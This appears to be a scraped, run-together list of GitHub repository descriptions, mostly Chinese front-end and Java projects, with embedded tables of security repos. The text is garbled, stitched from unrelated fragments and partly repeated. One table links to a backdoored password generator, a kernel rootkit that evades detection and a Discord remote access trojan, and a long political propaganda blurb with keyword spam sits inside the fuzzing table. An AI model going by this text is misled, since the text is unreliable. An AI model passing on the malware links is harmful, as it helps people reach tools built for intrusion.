主题Vue js 示例项目 简易留言板 本项目拥有完善的文档说明与注释 让您快速上手 Vue js 开发? Vue Validator? Vuex?最佳实践基于 Node js Koa2 实战开发的一套完整的博客项目网站 用 React 编写的基于Taro Dva构建的适配不同端 微信 百度 支付宝小程序 H5 React Native 等 的时装衣橱信息泄漏监控系统 伪装115浏览器干爆前端 一网打尽前端面试 学习路径 优秀好文等各类内容 帮助大家一年内拿到期望的 offer 前端性能监控系统 消息队列 高可用 集群等相关架构SpringBoot v2项目是努力打造springboot框架的极致细腻的脚手架 包括一套漂亮的前台 无其他杂七杂八的功能 原生纯净 中文文本标注工具 最全最新中国 省 市 区县 乡镇街道 json csv sql数据 一款轻巧的渐进式微信小程序框架 全网 1 w 阅读量的进阶前端技术博客仓库 Vue 源码解析 React 深度实践 TypeScript 进阶艺术 工程化 性能优化实践 完整开源 Java快速开发平台 基于Spring SpringMVC Mybatis架构 MStore提供更多好用的插件与模板 文章 商城 微信 论坛 会员 评论 支付 积分 工作流 任务调度等 同时提供上百套免费模板任意选择 价值源自分享 铭飞系统不仅一套简单好用的开源系统 更是一整套优质的开源生态内容体系 铭飞的使命就是降低开发成本提高开发效率 提供全方位的企业级开发解决方案 每月28定期更新版本WeHalo 简约风 的微信小程序版博客 基于 vue2 vuex 构建一个具有 45 个页面的大型单页面应用基于Vue3 Element Plus 的后台管理系统解决方案基于 vue element ui 的后台管理系统鲜亮的高饱和色彩 专注视觉的小程序组件库 ️ 跨平台桌面端视频资源播放器 简洁无广告 免费高颜值 后台管理主线版本基于三者并行开发维护 同时支持电脑 手机 平板 切换分支查看不同的vue版本 element plus版本已发布 vue3 vue3 vue vue3 x vue js 程序无国界 但程序员有国界 中国国家尊严不容挑衅 如果您在特殊时期 mall admin web是一个电商后台管理系统的前端项目 基于Vue Element实现 主要包括商品管理 订单管理 会员管理 促销管理 运营管理 内容管理 统计报表 财务管理 权限管理 设置等功能 一款完善的安全评估工具 支持常见 web 安全问题扫描和自定义 poc 使用之前务必先阅读文档Vue数据可视化组件库 类似阿里DataV 大屏数据展示 提供SVG的边框及装饰 图表 水位图 飞线图等组件 简单易用 长期更新 React版已发布 UI表单设计及代码生成器基于Vue的可视化表单设计器 让表单开发简单而高效 基于vue的高扩展在线网页制作平台 可自定义组件 可添加脚本 可数据统计 vue后台管理框架 精致的下拉刷新和上拉加载 js框架 支持vue 完美运行于移动端和主流PC浏览器 基于vue2 vuex element ui后台管理系统 Vue js高仿饿了么外卖App课程源码 coding imooc com class 74 html京东风格移动端 Vue2 Vue3 组件库eladmin前端源码 项目基于的前后端分离后台管理系统 权限控制采用 RBAC 菜单动态路由资源采集站在线播放uView UI 是uni app生态最优秀的UI框架 全面的组件和便捷的工具会让您信手拈来 如鱼得水Vue2 全家桶仿 微信App 项目 支持多人在线聊天和机器人聊天前端vue 后端koa 全栈式开发bilibili首页 A magical vue admin 记得star互联网大厂内推及大厂面经整理 并且每天一道面试题推送 每天五分钟 半年大厂中 Vue3 全家桶 Vant 搭建大型单页面商城项目 新蜂商城 Vue3 版本 技术栈为基于Vue开发的XMall商城前台页面 PC端 Vue全家桶 Vant 搭建大型单页面电商项目 ddbuy 7 orange cn前后端分离权限管理系统 精力有限 停止维护 用 Vue js 开发的跨三端应用Prototyping Tool For Vue Devs 适用于Vue的原型工具实战商城 基于Vue2 高仿微信App的单页应用electron跨平台音乐播放器 可搜网易云 QQ音乐 虾米音乐 支持QQ 微博 Github登录 云歌单 支持一键导入音乐平台歌单ThorUI组件库 轻量 简洁的移动端组件库 组件文档地址 thorui cn doc 最近更新时间 2 21 5 28uni app框架演示示例 Electron Vue 仿网易云音乐windows客户端 基于 Vue2 Vue CLI3 的高仿网易云 mac 客户端播放器 PC Online Music PlayerGitHub 泄露监控系统pear 梨子 轻量级的在线项目 任务协作系统 远程办公协作自选基金助手是一款Chrome扩展 用来快速获取关注基金的实时数据 查看自选基金的实时估值情况支持 markdown 渲染的博客前台展示Vue 音乐搜索 播放 Demo 一个基于 vue2 vue3 的 大转盘 九宫格 抽奖插件奖品 文字 图片 颜色 按钮均可配置 支持同步 异步抽奖 概率前 后端可控 自动根据 dpr 调整清晰度适配移动端 基于 Vue 的在线音乐播放器 PC Online music player美团饿了吗外卖红包外卖优惠券 先领红包再下单 外卖红包优惠券 cps分成 别人领红包下单 你拿佣金 讨论如何构建一套可靠的大型分布式系统用 vue 写小程序 基于 mpvue 框架重写 weui 基于Vue框架构建的github数据可视化平台使用GitHub API 搭建一个可动态发布文章的博客可视化拖拽组件库 DEMO基于开源组件 Inception SQLAdvisor SOAR 的SQL审核 SQL优化的Web平台显示当前网站的所有可用Tampermonkey脚本 专注Web与算法无缝滚动component精通以太坊 中文版 网页模拟桌面基于的多模块前后端分离的博客项目网易云音乐 QQ音乐 咪咕音乐 第三方 web端 可播放 vip 下架歌曲 基于权限管理的后台管理系统基于 Node js 的开源个人博客系统 采用 Nuxt Vue TypeScript 技术栈 一款简洁高效的VuePress知识管理 博客 blog 主题基于uni app的ui框架基于Vue Vuex iView的电子商城网站 Vue2 全家桶 Vant 搭建大型单页面商城项目 新蜂商城前后端分离版本 前端Vue项目源码酷狗 ️ 极客猿梦导航 独立开发者的导航站 Vue SpringBoot MyBatis 音乐网站基于 RageFrame2 的一款免费开源的基础商城销售功能的开源微商城 基于vue2 的网易云音乐播放器 api来自于NeteaseCloudMusicApi v2 为最新版本编写的一套后台管理系统全栈开发王者荣耀手机端官网和管理后台基于 Vue3 x TypeScript 的在线演示文稿应用 实现PPT幻灯片的在线编辑 演示 基于vue2 生态的后台管理系统模板开发的后台管理系统 Vchat 从头到脚 撸一个社交聊天系统 vue node mongodb h5编辑器类似maka 易企秀 账号 密码 admin996 公司展示 讨论Vue Spring boot前后端分离项目 wh web wh server的升级版 基于element ui的数据驱动表单组件基于 GitHub API 开发的图床神器 图片外链使用 jsDelivr 进行 CDN 加速 免下载 免安装 打开网站即可直接使用 免费 稳定 高效 ️ Vue初 中级项目 CnodeJS社区重构预览 DEMO 基于vue2全家桶实现的 仿移动端QQ基于Vue Echarts 构建的数据可视化平台 酷炫大屏展示模板和组件库 持续更新各行各业实用模板和炫酷小组件 基于Spring Boot的在线考试系统 预览地址 129 211 88 191 账户分别是admin teacher student 密码是admin123 6pan 6盘小白羊 第二版 vue3 antd typescript on bone and knife 基于Vue 全家桶 2 x 制作的美团外卖APP 本项目是一款基于 Avue 的表单设计器 拖拽式操作让你快速构建一个表单 一刻社区前端源码基于Vue iView Admin开发的XBoot前后端分离开放平台前端 权限可控制至按钮显示 动态路由权限菜单 多语言 简洁美观 前后端分离 ️一个开源的社区程序 临时测试站 https t myrpg cnecharts地图geoJson行政边界数据的实时获取与应用 省市区县多级联动下钻 真正意义的下钻至县级 附最新geoJson文件下载 Vue的Nuxt js服务端渲染框架 NodeJS为后端的全栈项目 Docker一键部署 面向小白的完美博客系统vue瀑布流组件 vue waterfall easy 2 x Ego 移动端购物商城 vue vuex ruoter webpack Vue js Node js Mongodb 前后端分离的个人博客头像加口罩小程序 基于uniapp使用vue快速实现 广告月收入4k 基于vue3 的管理端模板教你如何打造舒适 高效 时尚的前端开发环境基于 Flask 和 Vue js 前后端分离的微型博客项目 支持多用户 Markdown文章 喜欢 收藏文章 粉丝关注 用户评论 点赞 动态通知 站内私信 黑名单 邮件支持 管理后台 权限管理 RQ任务队列 Elasticsearch全文搜索 Linux VPS部署 Docker容器部署等基于 vue 和 heyui 组件库的中后端系统 admin heyui topVue 轻量级后台管理系统基础模板uni app项目插件功能集合We川大小程序 scuplus 使用wepy开发的完善的校园综合小程序 4 页面 前后端开源 包括成绩 课表 失物招领 图书馆 新闻资讯等等常见校园场景功能一个全随机的刷装备小游戏一个vue全家桶入门Demo 是一個可以幫助您 Vue js 的項目測試及偵錯的工具 也同時支持 Vuex及 Vue Router 微信公众号管理系统 包含公众号菜单管理 自动回复 素材管理 模板消息 粉丝管理 ️等功能 前后端都开源免费 基于vue 的管理后台 配合Blog Core与Blog Vue等多个项目使用海风小店 开源商城 微信小程序商城管理后台 后台管理 VUE IT之家第三方小程序版客户端 使用 mpvue 开发 兼容 web vue 可以拖拽排序的树形表格 现代 Web 开发语法基础与工程实践 涵盖 Web 开发基础 前端工程化 应用架构 性能与体验优化 混合开发 React 实践 Vue 实践 WebAssembly 等多方面 数据大屏可视化编辑器一个适用于摄影从业者 爱好者 设计师等创意行业从业者的图像工具箱 武汉大学图书馆助手 桌面端基于form generator 仿钉钉审批流程创建 表单创建 流程节点可视化配置 必填条件及校验 一个完整electron桌面记账程序 技术栈主要使用electron vue vuetify 开机自动启动 自动更新 托盘最小化 闪烁等常用功能 Nsis制作漂亮的安装包 程序猿的婚礼邀请函 一个基于vue和element ui的树形穿梭框及邮件通讯录版本见示例见 基于Gin Vue Element UI的前后端分离权限管理系统的前端模块通用书籍阅读APP BookChat 的 uni app 实现版本 支持多端分发 编译生成Android和iOS 手机APP以及各平台的小程序基于Vue3的Material design风格移动端组件库进阶资深前端开发在线考试系统 springboot vue前后端分离的一个项目 ️ 无后端的仿 YouTube Live Chat 风格的简易 Bilibili 弹幕姬vue后端管理系统界面 基于ui组件iviewBilibili直播弹幕库 for Mac Windows LinuxVue高仿网易云音乐 基本实现网易云所有音乐 MV相关功能 现已更新到第二版 仅用于学习 下面有详细教程 武汉大学图书馆助手 移动端Zeus基于Golang Gin casbin 致力于做企业统一权限 账号中心管理系统 包含账号管理 数据权限 功能权限 应用管理 多数据库适配 可docker 一键运行 社区活跃 版本迭代快 加群免费技术支持 Vue高仿网易云音乐 Vue入门实践 在线预览 暂时停止基于 Vue 和 ElementUI 构建的一个企业级后台管理系统 ️ 跨平台移动端视频资源播放器 简洁免费 ZY Player 移动端 APP 基于 Uni app 开发 Vue实战项目基于参考小米商城 实现的电商项目 h5制作 移动端专题活动页面可视化编辑仿钉钉审批流程设置动态表单页面设计 自动生成页面微前端项目实战vue项目 基于vue3 qiankun2 进阶版 github com wl ui wl mfe基于 d2 admin的RBAC权限管理解决方案VueNode 是一套基于的前后端分离项目 基于仿京东淘宝的 移动端H5电商平台 巨树 基于ztree封装的Vue树形组件 轻松实现海量数据的高性能渲染 微信红包封面领取 用户观看视频广告或者邀请用户可获取微信红包序列号基于 Vue 的可视化布局编辑器插件kbone ui 是一套能同时支持 小程序 kbone 和 vue 框架开发的多端 UI 库 PS 新版 kbone ui 已出炉并迁移到 kbone 主仓库 此仓库仅做旧版维护之用 一个vue的个人博客项目 配合 net core api教程 打造前后端分离Tumo Blog For Vue js 前后端分离bpmn js流程设计器组件 基于vue elementui美化属性面板 满足9 %以上的业务需求专门为 Weex 前端开发者打造的一套高质量UI框架 想用vue把我现在的个人网站重新写一下 新的风格 新的技术 什么都是新的 本项目是一个在线聊天系统 最大程度的还原了Mac客户端QQ vue cli3 后台管理模板 heart 基于vue2和vuex的复杂单页面应用 2 页面53个API 仿实验楼 基于 Vue Koa 的 WebDesktop 视窗系统 Jeebase是一款前后端分离的开源开发框架 基于开发 一套SpringBoot后台 两套前端页面 可以自由选择基于ElementUI或者AntDesign的前端界面 二期会整合react前端框架 Ant Design React 在实际应用中已经使用这套框架开发了CMS网站系统 社区论坛系统 微信小程序 微信服务号等 后面会逐步整理开源 本项目主要目的在于整合主流技术框架 寻找应用最佳项目实践方案 实现可直接使用的快速开发框架 使用 vue cli3 搭建的vue vuex router element 开发模版 集成常用组件 功能模块JEECG BOOT APP 移动解决方案 采用uniapp框架 一份代码多终端适配 同时支持APP 小程序 H5 实现了与JeecgBoot平台完美对接的移动解决方案 目前已经实现登录 用户信息 通讯录 公告 移动首页 九宫格等基础功能 明日方舟工具箱 支持中台美日韩服vue的验证码插件这里有一些标准组件库可能没有的功能组件 已有组件 放大镜 签到 图片标签 滑动验证 倒计时 水印 拖拽 大家来找茬 基于Vue2 Nodejs MySQL的博客 有后台管理系统 支持 登陆 注册 留言 评论 回复 点赞长江证券郑州大学超市管理系统天安门坦克桌面行驶工况茶马古道金融文本情感 | https://github.com/cirosantilli/china-dictatorhsip-2 | 31 | 18| | 20220427T12:21:50Z | Cyber Security ALL-IN-ONE Platform | https://github.com/yaklang/yakit | 2475 | 364| # backdoor on Github 推荐 | ts | title | url | stars | forks| | --- | --- | --- | --- | ---| | 20220427T21:55:50Z | Null | https://github.com/N3w-elf/auto_create_backdoor | 0 | 0| | 20220427T19:57:28Z | Null | https://github.com/mgalde/MagicBackdoor | 0 | 0| | 20220427T17:49:55Z | Null | https://github.com/spentera/Backdoors | 0 | 0| | 20220427T14:37:24Z | Resurrecting Trust in Facial Recognition: Mitigating Backdoor Attacks in Face Recognition to Prevent Potential Privacy Breaches | https://github.com/chamikara1986/BA-BAM | 0 | 0| | 20220427T14:08:04Z | PassGen by Rayan is a free and open-source password generator that generates infinite number of customized passwords up to the user%s input. However, this version has a hidden functionality; it opens a backdoor in the client%s machine for the host to exploit. | https://github.com/v0x45/PassGen-by-Rayan-w-Backdoor | 0 | 0| | 20220427T14:01:28Z | Linux Loadable Kernel Module (LKM) based rootkit (ring-0), capable of hiding itself, processes/implants, rmmod proof, has ability to bypass infamous rkhunter antirootkit. | https://github.com/reveng007/reveng_rtkit | 37 | 7| | 20220427T04:23:34Z | Null | https://github.com/Ekko-zn/IJCAI2022-Backdoor | 0 | 0| | 20220427T03:18:56Z | Fileless Discord remote access trojan | https://github.com/ch2sh/DiscoShell | 33 | 8| # symbolic execution on Github 推荐 | ts | title | url | stars | forks| | --- | --- | --- | --- | ---| | 20220427T16:31:09Z | KLEE Symbolic Execution Engine | https://github.com/klee/klee | 1960 | 554| | 20220427T15:40:38Z | Symbolic Execution Engine based on Ghidra%s PCode | https://github.com/borzacchiello/naaz | 50 | 3| | 20220427T07:04:25Z | Symbolic execution tool | https://github.com/trailofbits/manticore | 2826 | 411| # big4 on Github 推荐 | ts | title | url | stars | forks| | --- | --- | --- | --- | ---| # fuzz on Github 推荐 | ts | title | url | stars | forks| | --- | --- | --- | --- | ---| | 20220427T22:44:10Z | 2.0 of dnh auto fuzzer with greatly reduced scale | https://github.com/nickcopi/dnhautofuzz2.0 | 0 | 0| | 20220427T22:29:34Z | Null | https://github.com/Revan-tech/fuzzy-octo-waddle | 0 | 0| | 20220427T19:40:39Z | Null | https://github.com/Frankeo/fuzzy-search | 0 | 0| | 20220427T14:08:59Z | GraphFuzz is an experimental framework for building structure-aware, library API fuzzers. | https://github.com/hgarrereyn/GraphFuzz | 141 | 12| | 20220427T12:30:02Z | Null | https://github.com/olyzza/fuzzy-happiness | 0 | 0| | 20220427T12:23:39Z | 反中共政治宣传库。Anti Chinese government propaganda. https://github.com/cirosantilli/china-dictatorship 的备份backup. 住在中国真名用户的网友请别给星星,不然你要被警察请喝茶。常见问答集,新闻集和饭店和音乐建议。卐习万岁卐。冠状病毒审查郝海东新疆改造中心六四事件法轮功 996.ICU709大抓捕巴拿马文件邓家贵低端人口西藏骚乱。Friends who live in China and have real name on account, please don%t star this repo, or else the police might pay you a visit. Home to the mega-FAQ, news compilation, restaurant and music recommendations.Heil Xi 卐. 大陆修宪香港恶法台湾武统朝鲜毁约美中冷战等都是王沪宁愚弄习思想极左命运共同体的大策划中共窃国这半个多世纪所犯下的滔天罪恶,前期是毛泽东策划的,中期6.4前后是邓小平策划的,黄牛数据分析后期是毛的极左追随者三朝罪恶元凶王沪宁策划的。王沪宁高小肆业因文革政治和情报需要保送“学院外语班“红色仕途翻身,所以王的本质是极左的。他是在上海底层弄堂长大的,因其本性也促成其瘪三下三滥个性,所以也都说他有易主“变色龙”哈巴狗“的天性。大陆像王沪宁这样学马列政治所谓%法学%专业的人,在除朝鲜古巴所有国家特别是在文明发达国家是无法找到专业对口工作必定失业,唯独在大陆却是重用的紧缺“人才”,6.4后中共信仰大危机更是最重用的救党“人才”。这也就是像王沪宁此类工农兵假“大学生”平步青云的原因,他们最熟悉毛泽东历次运动的宫庭内斗经验手段和残酷的阶级斗争等暴力恐怖的“政治学”。王沪宁能平步青云靠他这马毛伪“政治学”资本和头衔,不是什么真才实学,能干实事有点真才实学的或许在他手下的谋士及秘书班子中可以找到。王沪宁的“真才实学”只不过是一个只读四年小学的人,大半辈子在社会上磨炼特别是在中共官场滚打炼出的的手段和经验而已,他和习近平等保送的工农兵假“大学生”都一样,无法从事原“专业”都凭红资本而从政。六四学运期间各界一边倒支持学生,王沪宁一度去法国躲避和筹谋,他还加入了反学运签名,成为极少有的反学运者仕途突显,在六四和苏联垮台后中共意识形态危机,江泽民上台看上唯一能应急的王沪宁聚谋士泡制的%稳定统一领导%和之后的%新权威%谬论。左转被邓小平南巡阻止后,王策划顺邓经济改革却将政治改革逐步全面终止和倒退,泡制“三个代表”为极左转建立庞大牢固的红色既得利益集团。因此六四后各重大决策和危机难题都摆在中共中央政策研究室王沪宁桌面上,使王沪宁成了此后中共三朝都无法摆脱的幕后最有决策性实权的人,中共中央政策研究室是王为其野心巨资经营几十年,聚众谋士的间谍情报汇总研究的特务机关和策划制定决策重要机构与基地,王沪宁本人和决定其仕途关键的首任岳父及家属就有情报工作背景。中央政研室重要到王沪宁入常后为了死抓这中共情报与决策大权,宁可放弃国家副主席和中央党校校长。后再加个除习外唯他担任的中共几核心领导小组之一的“不忘初心牢记使命”主题教育工作小组组长。此后他把持的舆论必将以宣传“不忘初心牢记使命”为主,打造众所周知的所谓“习思想”其实是”王思想“。王自从主导中央政研室开始决策后,策划中止邓小平的与美妥协路线回归毛极左的反美路线。帮助前南斯拉夫提供情报打落美机放中使馆引发炸使馆事件,以此掀起六四后唯一的全国大规模游行并借此反美而起家。后又帮江泽民提供法轮功会是超过中共组织的情报,策划决策镇压迫害开始并没有把矛头指向江的法轮功群体,策划决定阻止党内外近三十年来平反六四的呼声。致远黑皮书马拉松程序员易支付英语台词文字匹配美团点评各业务线提供知识库团队共享阿里云高精Excel识别德讯 ·吉特胡布薄熙来黑科技习近平讲话模拟器习近平音源黑马程序员MySQL数据库玉米杂草数据集销售系统开发疫情期间网民情绪识别比赛996icu996 icu学习强国预测结果导出赖伟林刺杀小说家购物商场英语词汇量小程序联级选择器Bitcoin区块链 技术面试必备基础知识 Leetcode 计算机操作系统 计算机网络 系统设计 Java学习 面试指南 一份涵盖大部分 Java 程序员所需要掌握的核心知识 准备 Java 面试 首选 JavaGuide Python 1 天从新手到大师刷算法全靠套路 认准 labuladong 就够了 免费的计算机编程类中文书籍 欢迎投稿用动画的形式呈现解LeetCode题目的思路 互联网 Java 工程师进阶知识完全扫盲 涵盖高并发 分布式 高可用 微服务 海量数据处理等领域知识后端架构师技术图谱mall项目是一套电商系统 包括前台商城系统及后台管理系统 基于SpringBoot MyBatis实现 采用Docker容器化部署 前台商城系统包含首页门户 商品推荐 商品搜索 商品展示 购物车 订单流程 会员中心 客户服务 帮助中心等模块 后台管理系统包含商品管理 订单管理 会员管理 促销管理 运营管理 内容管理 统计报表 财务管理 权限管理 设置等模块 微信小程序开发资源汇总 最全中华古诗词数据库 唐宋两朝近一万四千古诗人 接近5 5万首唐诗加26万宋诗 两宋时期1564位词人 21 5 首词 uni app 是使用 Vue 语法开发小程序 H5 App的统一框架2 21年最新总结 阿里 腾讯 百度 美团 头条等技术面试题目 以及答案 专家出题人分析汇总 科学上网 自由上网 翻墙 软件 方法 一键翻墙浏览器 免费账号 节点分享 vps一键搭建脚本 教程AiLearning 机器学习 MachineLearning ML 深度学习 DeepLearning DL 自然语言处理 NLP123 6智能刷票 订票开放式跨端跨框架解决方案 支持使用 React Vue Nerv 等框架来开发微信 京东 百度 支付宝 字节跳动 QQ 小程序 H5 React Native 等应用 taro zone 掘金翻译计划 可能是世界最大最好的英译中技术社区 最懂读者和译者的翻译平台 no evil 程序员找工作黑名单 换工作和当技术合伙人需谨慎啊 更新有赞 算法面试 算法知识 针对小白的算法训练 还包括 1 阿里 字节 滴滴 百篇大厂面经汇总 2 千本开源电子书 3 百张思维导图 右侧来个 star 吧 English version supported 955 不加班的公司名单 工作 955 work–life balance 工作与生活的平衡 诊断利器Arthas The Way to Go 中文译本 中文正式名 Go 入门指南 Java面试 Java学习指南 一份涵盖大部分Java程序员所需要掌握的核心知识 教程 技术栈示例代码 快速简单上手教程 2 17年买房经历总结出来的买房购房知识分享给大家 希望对大家有所帮助 买房不易 且买且珍惜http下载工具 基于http代理 支持多连接分块下载 动手学深度学习 面向中文读者 能运行 可讨论 中英文版被全球175所大学采用教学 阿里云计算平台团队出品 为监控而生的数据库连接池程序员简历模板系列 包括PHP程序员简历模板 iOS程序员简历模板 Android程序员简历模板 Web前端程序员简历模板 Java程序员简历模板 C C 程序员简历模板 NodeJS程序员简历模板 架构师简历模板以及通用程序员简历模板采用自身模块规范编写的前端 UI 框架 遵循原生 HTML CSS JS 的书写形式 极低门槛 拿来即用 贵校课程资料民间整理 企业级低代码平台 前后端分离架构强大的代码生成器让前后端代码一键生成 无需写任何代码 引领新的开发模式OnlineCoding 代码生成 手工MERGE 帮助Java项目解决7 %重复工作 让开发更关注业务 既能快速提高效率 帮助公司节省成本 同时又不失灵活性 我是依扬 木易杨 公众号 高级前端进阶 作者 每天搞定一道前端大厂面试题 祝大家天天进步 一年后会看到不一样的自己 冴羽写博客的地方 预计写四个系列 JavaScript深入系列 JavaScript专题系列 ES6系列 React系列 中文分词 词性标注 命名实体识别 依存句法分析 语义依存分析 新词发现 关键词短语提取 自动摘要 文本分类聚类 拼音简繁转换 自然语言处理flutter 开发者帮助 APP 包含 flutter 常用 14 组件的demo 演示与中文文档 下拉刷新 上拉加载 二级刷新 淘宝二楼智能下拉刷新框架 支持越界回弹 越界拖动 具有极强的扩展性 集成了几十种炫酷的Header和 Footer 该项目已成功集成 actuator 监控 admin 可视化监控 logback 日志 aopLog 通过AOP记录web请求日志 统一异常处理 json级别和页面级别 freemarker 模板引擎 thymeleaf 模板引擎 Beetl 模板引擎 Enjoy 模板引擎 JdbcTemplate 通用JDBC操作数据库 JPA 强大的ORM框架 mybatis 强大的ORM框架 通用Mapper 快速操作Mybatis PageHelper 通用的Mybatis分页插件 mybatis plus 快速操作Mybatis BeetlSQL 强大的ORM框架 u Python资源大全中文版 包括 Web框架 网络爬虫 模板引擎 数据库 数据可视化 图片处理等 由 开源前哨 和 Python开发者 微信公号团队维护更新 吴恩达老师的机器学习课程个人笔记To Be Top Javaer Java工程师成神之路循序渐进 学习博客Spring系列源码 mrbird cc谢谢可能是让你受益匪浅的英语进阶指南镜像网易云音乐 Node js API service快速 简单避免OOM的java处理Excel工具基于 Vue js 的小程序开发框架 从底层支持 Vue js 语法和构建工具体系 中文版 Apple 官方 Swift 教程本项目曾冲到全球第一 干货集锦见本页面最底部 另完整精致的纸质版 编程之法 面试和算法心得 已在京东 当当上销售好耶 是女装Security Guide for Developers 实用性开发人员安全须知 阿里巴巴 MySQL binlog 增量订阅 消费组件 ECMAScript 6入门 是一本开源的 JavaScript 语言教程 全面介绍 ECMAScript 6 新增的语法特性 C C 技术面试基础知识总结 包括语言 程序库 数据结构 算法 系统 网络 链接装载库等知识及面试经验 招聘 内推等信息 一款优秀的开源博客发布应用 Solutions to LeetCode by Go 1 % test coverage runtime beats 1 % LeetCode 题解分布式任务调度平台XXL JOB 谷粒 Chrome插件英雄榜 为优秀的Chrome插件写一本中文说明书 让Chrome插件英雄们造福人类公众号 加1 同步更新互联网公司技术架构 微信 淘宝 微博 腾讯 阿里 美团点评 百度 Google Facebook Amazon eBay的架构 欢迎PR补充IntelliJ IDEA 简体中文专题教程程序员技能图谱前端面试每日 3 1 以面试题来驱动学习 提倡每日学习与思考 每天进步一点 每天早上5点纯手工发布面试题 死磕自己 愉悦大家 4 道前端面试题全面覆盖小程序 软技能 华为鸿蒙操作系统 互联网首份程序员考公指南 由3位已经进入体制内的前大厂程序员联合献上 Mac微信功能拓展 微信插件 微信小助手 A plugin for Mac WeChat 机器学习 西瓜书 公式推导解析 在线阅读地址一款轻量级 高性能 功能强大的内网穿透代理服务器 支持tcp udp socks5 http等几乎所有流量转发 可用来访问内网网站 本地支付接口调试 ssh访问 远程桌面 内网dns解析 内网socks5代理等等 并带有功能强大的web管理端一款面向泛前端产品研发全生命周期的效率平台 文言文編程語言清华大学计算机系课程攻略面向云原生微服务的高可用流控防护组件 On Java 8 中文版 本文原文由知名 Hacker Eric S Raymond 所撰寫 教你如何正確的提出技術問題並獲得你滿意的答案 React Native指南汇集了各类react native学习资源 开源App和组件1 Days Of ML Code中文版千古前端图文教程 超详细的前端入门到进阶学习笔记 从零开始学前端 做一名精致优雅的前端工程师 公众号 千古壹号 作者 基于 React 的渐进式研发框架 ice work视频播放器支持弹幕 外挂字幕 支持滤镜 水印 gif截图 片头广告 中间广告 多个同时播放 支持基本的拖动 声音 亮度调节 支持边播边缓存 支持视频自带rotation的旋转 9 27 之类 重力旋转与手动旋转的同步支持 支持列表播放 列表全屏动画 视频加载速度 列表小窗口支持拖动 动画效果 调整比例 多分辨率切换 支持切换播放器 进度条小窗口预览 列表切换详情页面无缝播放 rtsp concat mpeg JumpServer 是全球首款开源的堡垒机 是符合 4A 的专业运维安全审计系统 Linux命令大全搜索工具 内容包含Linux命令手册 详解 学习 搜集 git io linux book Node js 包教不包会 by alsotang又一个小商城 litemall Spring Boot后端 Vue管理员前端 微信小程序用户前端 Vue用户移动端微信 跳一跳 Python 辅助Java资源大全中文版 包括开发库 开发工具 网站 博客 微信 微博等 由伯乐在线持续更新 python模拟登陆一些大型网站 还有一些简单的爬虫 希望对你们有所帮助 ️ 如果喜欢记得给个star哦 C 那些事 网络爬虫实战 淘宝 京东 网易云 B站 123 6 抖音 笔趣阁 漫画小说下载 音乐电影下载等deeplearning ai 吴恩达老师的深度学习课程笔记及资源 Spring Boot基础教程 Spring Boot 2 x版本连载中 帮助 Android App 进行组件化改造的路由框架 最接近原生APP体验的高性能框架基于Vue3 Element Plus 的后台管理系统解决方案程序员如何优雅的挣零花钱 2 版 升级为小书了 从Java基础 JavaWeb基础到常用的框架再到面试题都有完整的教程 几乎涵盖了Java后端必备的知识点spring boot 实践学习案例 是 spring boot 初学者及核心技术巩固的最佳实践 另外写博客 用 OpenWrite 最好用的 V2Ray 一键安装脚本 管理脚本中国程序员容易发音错误的单词 统计学习方法 的代码实现关于Python的面试题本项目将 动手学深度学习 Dive into Deep Learning 原书中的MXNet实现改为PyTorch实现 提高 Android UI 开发效率的 UI 库前端精读周刊 帮你理解最前沿 实用的技术 的奇技淫巧时间选择器 省市区三级联动 Python爬虫代理IP池 proxy pool LeetCode 刷题攻略 2 道经典题目刷题顺序 共6 w字的详细图解 视频难点剖析 5 余张思维导图 从此算法学习不再迷茫 来看看 你会发现相见恨晚 一个基于 electron 的音乐软件Flutter 超完整的开源项目 功能丰富 适合学习和日常使用 GSYGithubApp系列的优势 我们目前已经拥有四个版本 功能齐全 项目框架内技术涉及面广 完成度高 持续维护 配套文章 适合全面学习 对比参考 跨平台的开源Github客户端App 更好的体验 更丰富的功能 旨在更好的日常管理和维护个人Github 提供更好更方便的驾车体验Σ 同款Weex版本同款React Native版本 https g 这是一个用于显示当前网速 CPU及内存利用率的桌面悬浮窗软件 并支持任务栏显示 支持更换皮肤 是一个跨平台的强加密无特征的代理软件 零配置 V2rayU 基于v2ray核心的mac版客户端 用于科学上网 使用swift编写 支持vmess shadowsocks socks5等服务协议 支持订阅 支持二维码 剪贴板导入 手动配置 二维码分享等算法模板 最科学的刷题方式 最快速的刷题路径 你值得拥有 经典编程书籍大全 涵盖 计算机系统与网络 系统架构 算法与数据结构 前端开发 后端开发 移动开发 数据库 测试 项目与团队 程序员职业修炼 求职面试等wangEditor 轻量级web富文本框前端跨框架跨平台框架 每个 JavaScript 工程师都应懂的33个概念 leonardomso一个可以观看国内主流视频平台所有视频的客户端Android开发人员不得不收集的工具类集合 支付宝支付 微信支付 统一下单 微信分享 Zip4j压缩 支持分卷压缩与加密 一键集成UCrop选择圆形头像 一键集成二维码和条形码的扫描与生成 常用Dialog WebView的封装可播放视频 仿斗鱼滑动验证码 Toast封装 震动 GPS Location定位 图片缩放 Exif 图片添加地理位置信息 经纬度 蛛网等级 颜色选择器 ArcGis VTPK 编译运行一下说不定会找到惊喜 123 6 购票助手 支持集群 多账号 多任务购票以及 Web 页面管理 编程随想 收藏的电子书清单 多个学科 含下载链接 Banner 2 来了 Android广告图片轮播控件 内部基于ViewPager2实现 Indicator和UI都可以自定义 零代码 热更新 自动化 ORM 库 后端接口和文档零代码 前端 客户端 定制返回 JSON 的数据和结构 Linux Windows macOS 跨平台 V2Ray 客户端 支持使用 C Qt 开发 可拓展插件式设计 walle 瓦力 Devops开源项目代码部署平台基于 node js Mongodb 构建的后台系统 js 源码解析一个涵盖六个专栏分布式消息队列 分布式事务的仓库 希望胖友小手一抖 右上角来个 Star 感恩 1 24基于 vue element ui 的后台管理系统磁力链接聚合搜索中华人民共和国行政区划 省级 省份直辖市自治区 地级 城市 县级 区县 乡级 乡镇街道 村级 村委会居委会 中国省市区镇村二级三级四级五级联动地址数据 iOS开发常用三方库 插件 知名博客等等LeetCode题解 151道题完整版/中文文案排版指北最良心的 Python 教程 业内为数不多致力于极致体验的超强全自研跨平台 windows android iOS 流媒体内核 通过模块化自由组合 支持实时RTMP推流 RTSP推流 RTMP播放器 RTSP播放器 录像 多路流媒体转发 音视频导播 动态视频合成 音频混音 直播互动 内置轻量级RTSP服务等 比快更快 业界真正靠谱的超低延迟直播SDK 1秒内 低延迟模式下2 4 ms 一个 PHP 微信 SDK ️ 跨平台桌面端视频资源播放器 简洁无广告 免费高颜值 后台管理主线版本基于三者并行开发维护 同时支持电脑 手机 平板 切换分支查看不同的vue版本 element plus版本已发布 vue3 vue3 vue vue3 x vue js 程序无国界 但程序员有国界 